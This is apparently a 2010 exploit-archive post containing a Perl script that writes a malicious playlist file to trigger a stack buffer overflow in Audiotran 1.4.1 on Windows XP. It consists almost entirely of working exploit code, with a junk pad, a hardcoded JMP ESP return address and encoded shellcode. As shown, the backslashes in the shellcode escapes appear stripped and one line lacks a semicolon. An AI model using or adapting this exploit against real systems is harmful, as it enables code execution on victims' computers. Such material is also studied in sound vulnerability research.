audiotran141-overflow.txt
Posted on 18 January 2010
# Exploit Title: Audiotran v1.4.1 direct RET BOF # Date: 2010-1-16 # Author: Jacky # Software Link: http://www.e-soft.co.uk/Audiotran.htm # Version: 1.4.1 # Tested on: Windows XP SP2 # CVE : [if exists] # Code : #Audiotran v1.4.1 Direct RET local BOF Vulnerability. #Exploit Discovered by Sébastien Duquette (Greetz to him :P ) #Written and coded by Jacky #All Greetz to Corelan team ! #I saw this exploit written in python with SEH method ! #When i tested it i saw that it could be exploited by a Direct RET Address ! my $file="Crash.pls"; my $junk="A"x1324; my $eip=pack('V',0x77D8AED0); #JMP ESP from USER32.DLL! my $presc="SEXY"; my $sc="x90"x50; $sc=$sc."xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49". "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36". "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34". "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41". "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54". "x42x50x42x50x42x30x4bx38x45x44x4ex43x4bx58x4ex57". "x45x50x4ax37x41x50x4fx4ex4bx38x4fx44x4ax31x4bx38". "x4fx55x42x32x41x30x4bx4ex49x34x4bx58x46x43x4bx58". "x41x50x50x4ex41x53x42x4cx49x49x4ex4ax46x38x42x4c". "x46x47x47x30x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e". "x46x4fx4bx43x46x55x46x52x46x50x45x47x45x4ex4bx58". "x4fx35x46x42x41x50x4bx4ex48x36x4bx58x4ex30x4bx34". "x4bx48x4fx35x4ex51x41x30x4bx4ex4bx38x4ex31x4bx48". "x41x30x4bx4ex49x38x4ex35x46x32x46x50x43x4cx41x33". "x42x4cx46x36x4bx48x42x54x42x33x45x38x42x4cx4ax57". "x4ex50x4bx48x42x54x4ex30x4bx38x42x57x4ex41x4dx4a". "x4bx48x4ax46x4ax30x4bx4ex49x50x4bx58x42x48x42x4b". "x42x50x42x30x42x30x4bx38x4ax36x4ex53x4fx35x41x43". "x48x4fx42x46x48x55x49x48x4ax4fx43x58x42x4cx4bx57". "x42x35x4ax36x42x4fx4cx58x46x50x4fx55x4ax46x4ax49". "x50x4fx4cx58x50x50x47x35x4fx4fx47x4ex43x46x41x46". "x4ex46x43x36x42x30x5a"; open(INI,">$file"); print "[+]Creating Malicious Playlist File! "; print INI $junk.$eip.$presc.$sc; print "[+]File Created! "; print "[+]Real Author of the vulnerability is Sebastien Duquette! " print "[+]All Rights are reserved to him ! "; print "[+]Coded by Jacky! "; close(INI); ________________________________ Keep your friends updated— even when you’re not signed in.<http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_5:092010>